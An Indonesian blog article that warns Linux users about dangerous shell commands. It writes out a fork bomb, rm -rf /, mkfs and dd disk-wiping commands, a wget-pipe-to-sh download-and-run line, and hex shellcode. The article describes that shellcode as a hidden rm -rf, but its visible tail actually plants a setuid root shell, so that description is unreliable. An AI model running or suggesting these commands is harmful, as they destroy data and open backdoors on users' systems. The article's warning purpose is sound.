News ART Stake

Terbaru

Perintah Linux yang berbahaya Anda Harus Hati-Hati!

Hasil gambar untuk Perintah Linux yang berbahaya Anda Harus Hati-Hati!

Para pengguna Linux shell harus berhati-hati dengan memasukkan kode perintah (command code) pada terminal perintah (terminal commands) Linux Anda, karena hanya dengan command yang sangat sederhana sekali pun dapat menyebabkan hilangnya data-data penting Anda, seperti penghapusan folder, file atau folder root, dan lainnya.

Dalam beberapa kasus, Linux memang menjalankan perintah secara langsung tanpa meminta konfirmasi terlebih dulu kepada user, di mana hal tersebut sering menyebabkan kehilangan data-data terpenting dan berharga yang Anda miliki, serta informasi yang tersimpan dalam file dan folder tersebut

Sebenarnya ini menjadi hal yang sangat umum bagi para pengguna baru yang mencari informasi online pada konten atau artikel di web terkait perintah maupun kode pada Linux mereka, di mana pada konten web tersebut merekomendasikan pengguna baru Linux untuk menjalankan perintah tersebut.
Tanpa disadari, pengguna baru Linux yang memasukkan kode maupun perintah yang didapatkannya dari konten web tadi ternyata membahayakan sistem Linux mereka. Sungguh sangat tragis melihat kasus tersebut terjadi pada pengguna baru.

Seakan-akan, pihak yang tidak bertanggung jawab secara sengaja menjerumuskan para pengguna baru Linux yang sekiranya masih tidak mengerti apa-apa itu ke dalam hal yang buruk, khususnya bagi sistem Linux yang mereka punya.
Kami telah mengumpulkan beberapa perintah Linux yang cukup berbahaya bagi sistem Anda untuk membantu Anda menghindari kejadian seperti kasus di atas.

Perlu diingat bahwa perintah-perintah berikut ini memang sangat berbahaya dan bahkan dapat diubah dalam berbagai cara untuk menghasilkan perintah baru yang dapat menimbulkan kerusakan yang lebih parah.

Sebuah hal penting yang perlu diperhatikan adalah bahwa beberapa perintah ini hanya berbahaya jika perintah tersebut diterapkan pada sudo di Ubuntu. Sedangkan pada distro lain dari Linux, sebagian besar perintah yang diberikan akan sangat berbahaya untuk mengeksekusi sebagai sistem root. 

1. Perintah "Fork Bomb"

:(){ :|: & };: - juga dikenal sebagai "Fork Bomb" yang merupakan penolakan serangan layanan terhadap sistem Linux.

:(){ :|: & };: merupakan fungsi bash. Setelah dieksekusi, perintah tersebut mengulang beberapa kali dengan sendirinya sampai sistem membeku.

Satu-satunya cara untuk menghentikan perintah tersebut ialah dengan cara me-restart sistem Linux Anda. Jadi, berhati-hatilah ketika menjalankan perintah ini pada Linux shell Anda.

2. Perintah Rm -Rf

Perintah rm -Rf adalah cara tercepat untuk menghapus folder beserta isinya dalam sistem operasi Linux. Jika Anda tidak tahu cara menggunakannya dengan benar, maka dampaknya bisa menjadi sangat berbahaya bagi sistem. Kombinasi yang paling umum dan opsi yang digunakan dengan perintah Rm -Rf tercantum di bawah ini:
  • rm command digunakan untuk menghapus file-file dalam sistem Linux
  • rm -f command digunakan untuk menghilangkan file read-only dalam folder secara langsung tanpa konfirmasi terlebih dulu.
  • rm -r command digunakan untuk menghapus isi dari folder secara rekursif
  • rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
  • rm -rf/ command digunakan untuk penghapusan data secara paksa (akan menghapus bahkan pada file terproteksi sekalipun) dari semua isi direktori root maupun sub folder.
  • rm -rf* command digunakan untuk penghapusan secara paksa terhadap semua konten dalam direktori saat ini (bahkan di dalam direktori saat ini Anda gunakan) dan sub foldernya.
  • rm -rf. command digunakan untuk penghapusan paksa semua konten dalam folder saat ini dan subfolder. Perintah rm -r.[^.]* juga dapat digunakan, karena fungsinya sama
  • rm -i command digunakan untuk menghilangkan file dan folder dengan konfirmasi yang nantinya akan muncul sebelum penghapusan dilakukan.

3. Perintah mv folder/dev/null

Perintah mv folder/dev/null ini juga sangat berbahaya bagi sistem Linux Anda. Dev/null atau null device merupakan file perangkat yang menghapus semua data yang tertulis di atasnya, tetapi nantinya akan muncul laporan palsu yang mengatakan bahwa operasi penulisan dijalankan dengan sukses. Hal ini dikenal sebagai bitbucket atau black hole.

4. Perintah mkfs

mkfs bisa menjadi perintah yang sangat berbahaya bagi sistem Linux Anda jika tidak mengerti tujuan penggunaannya. Apa pun yang ditulis setelah menerapkan perintah mkfsini akan diformat dan diganti dengan sistem file Linux kosong.

Semua perintah yang disebutkan di bawah ini akan memformat hard drive dan memerlukan izin hak administrator pada sistem, antara lain:
  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

Adapun perintah mkfs.cramfs ini akan melakukan hal yang sama seperti di atas, tetapi perintah ini tidak memerlukan izin hak administrator untuk mengeksekusinya.

5. Perintah Tar Bomb

Perintah tar ini digunakan untuk menggabungkan beberapa file ke dalam satu file arsip dalam format .tar. Ini merupakan file arsip yang meledak menjadi ribuan bahkan jutaan file dengan nama yang mirip dengan file yang ada ke dalam direktori saat ini, bukan masuk ke direktori baru ketika mengekstraknya.

Anda dapat menghindarinya dengan membuat direktori pelindung baru secara teratur setiap kali Anda menerima file .tar dan kemudian memindahkan file .tar yang diterima tersebut ke direktori saat ini sebelum di ekstrak.

Jika file tar tersebut memang bom tar, maka Anda dapat menghapus direktori yang baru dibuat untuk menyingkirkannya. Cara lain untuk menghindari ledakan bom tar adalah melalui opsi perintah -t untuk membuat daftar semua isi dari file tar dan memberikan gambaran tentang jenis konten yang terdapat dalam file tar tersebut.

6. Perintah dd

Perintah dd digunakan untuk menyalin dan mengkonversi partisi hard disk. Namun, perintah ini juga dapat berubah menjadi perintah berbahaya jika Anda menetapkan tujuan yang salah.

Berikut daftar perintah yang terkait:
  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

Adapun perintah ini akan mengubah menjadi nol seluruh hard drive primer: dd if=/dev/zero of=/dev/had.

7. Kode Script Shell

Seseorang mungkin menipu Anda dengan memberikan sebuah link ke script shell, di mana link tersebut dapat mendukung sistem untuk men-download dan menjalankan file tersebut. Script shell itu mungkin saja berisi beberapa kode berbahaya bagi sistem Linux. Format perintah mungkin terlihat seperti ini: wget http://some_malicious_source -O- | sh.

8. Malicious Source Code

Mungkin seseorang memberi Anda suatu source code (kode sumber) dan meminta Anda untuk mengkompilasinya ke sistem. Namun, kode tersebut mungkin tampak seperti kode biasa, namun pada kenyataannya beberapa kode berbahaya yang menyamar dalam kode sumber dan dapat menyebabkan kerusakan pada sistem Anda.

Untuk menghindari serangan semacam ini, Anda cukup menerima dan mengkompilasi source code dari sumber yang terpercaya. Selain berasal dari sumber terpercaya, sebaiknya jangan diterima maupun dikompilasi ke sistem Linux Anda!

9. Dekompresi Bom

Ketika Anda telah menerima file terkompresi dan Anda dimintai untuk mengekstrak file tersebut yang ukurannya terlihat sangat kecil yang hanya beberapa kilobyte (Kb). Namun, jangan dianggap sepele bahwa file kompresi yang berukuran kecil tersebut ternyata berisi data-data yang sangat sangat banyak dan padat.

Setelah file didekompresi, bisa saja kemungkinan ratusan GB data diekstrak yang dapat mengisi hard drive hingga menurunkan kinerja sistem Anda. Untuk menghindari situasi ini, selalu ingat untuk menerima data dari sumber yang dapat dipercaya.

Dangerous Linux Commands
Baris perintah Linux produktif, berguna dan menarik tapi kadang kala bisa sangat berbahaya - terutama bila Anda tidak yakin dengan apa yang Anda lakukan. Untuk beberapa perintah CLI ... Anda mungkin ingin memeriksa sintaks itu lagi ... untuk berjaga-jaga ... sebelum Anda menekan ENTER.
rm -rf Command
Perintah rm-rf adalah salah satu cara tercepat untuk menghapus folder dan isinya. Tapi salah ketik atau ketidaktahuan bisa mengakibatkan kerusakan sistem yang tidak terpulihkan. Beberapa pilihan yang digunakan dengan perintah rm adalah.

Perintah rm di Linux digunakan untuk menghapus file.
Perintah rm -r menghapus folder secara rekursif, bahkan folder kosong.
Perintah rm -f menghapus 'Read only File' tanpa bertanya.
Rm -rf /: Paksa penghapusan semuanya di direktori root.
Rm -rf *: Paksa penghapusan semuanya di direktori / direktori kerja saat ini.
Rm -rf. : Paksa penghapusan folder dan sub folder saat ini.
Makanya, hati-hati saat Anda menjalankan perintah rm-rf. Untuk mengatasi kesalahan file yang tidak disengaja dengan perintah 'rm', buat sebuah alias perintah 'rm' sebagai 'rm -i' pada file ".bashrc", ia akan meminta Anda untuk mengkonfirmasi setiap penghapusan.

  • :(){:|:&};: Command
Perintah ini sebenarnya adalah sebuah bom fork. Ini beroperasi dengan mendefinisikan sebuah fungsi yang disebut ':', yang menyebut dirinya dua kali, sekali di latar depan dan sekali di latar belakang. Ini terus mengeksekusi berulang-ulang sampai sistem membeku.

:(){:|:&};: 
 

  • command > /dev/sda
Contoh di atas menulis output dari 'perintah' pada blok / dev / sda. Perintah di atas menulis data mentah dan semua file di blok akan diganti dengan data mentah, sehingga mengakibatkan hilangnya total data pada blok.
mv folder /dev/null
Perintah mv akan memindahkan 'folder' ke / dev / null. Di Linux / dev / null atau perangkat null adalah file khusus yang membuang semua data yang ditulis untuk itu dan laporan bahwa operasi tulis berhasil.

  • # mv /home/user/* /dev/null
Perintah di atas akan memindahkan semua isi direktori Pengguna ke / dev / null, yang secara harfiah berarti semua yang ada dikirim ke blackhole (null).

wget http://malicious_source -O- | sh
Contoh wget ini akan mendownload skrip dari sumber berbahaya dan kemudian mengeksekusinya.

  • mkfs.ext3 /dev/sda
Contohnya akan memformat 'sda'. Setelah eksekusi perintah di atas, Hard Disk Drive Anda akan ditandai sebagai 'NEW', Anda akan ditinggalkan tanpa data dan dalam tahap sistem yang tidak terpulihkan.

> file
Perintah ini digunakan untuk menyiram isi file. Jika perintah di atas dijalankan dengan kesalahan ketik atau ketidaktahuan seperti "> xt.conf", itu akan 'menyiram' file konfigurasi atau file sistem lainnya.

  • ^foo^bar
Perintah ini digunakan untuk mengedit perintah run sebelumnya tanpa perlu mengetik ulang keseluruhan perintah lagi. Ini benar-benar bisa sangat berbahaya.
dd if=/dev/random of=/dev/sda
Dd ini akan menghapus perangkat blok sda dan menulis sampah acak. Sistem Anda akan ditinggalkan pada tahap yang tidak konsisten dan tidak terpulihkan.

  • Hidden Command
 Perintah di bawah tidak lebih dari sebuah rm-rf. Di sini, perintah disembunyikan di hex dan pengguna bisa tertipu untuk menjalankannya. Menjalankan kode ini akan menghapus partisi root anda. Perintah di sini menunjukkan bahwa ancaman itu mungkin tersembunyi dan terkadang tidak dapat dideteksi secara normal.



char esp[] __attribute__ ((section(“.text”))) /* e.s.p

release */

= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″

“\x6e\x2f\x73\x68\x00\x2d\x63\x00″

“cp -p /bin/sh /tmp/.beyond; chmod 4755


/tmp/.beyond;”;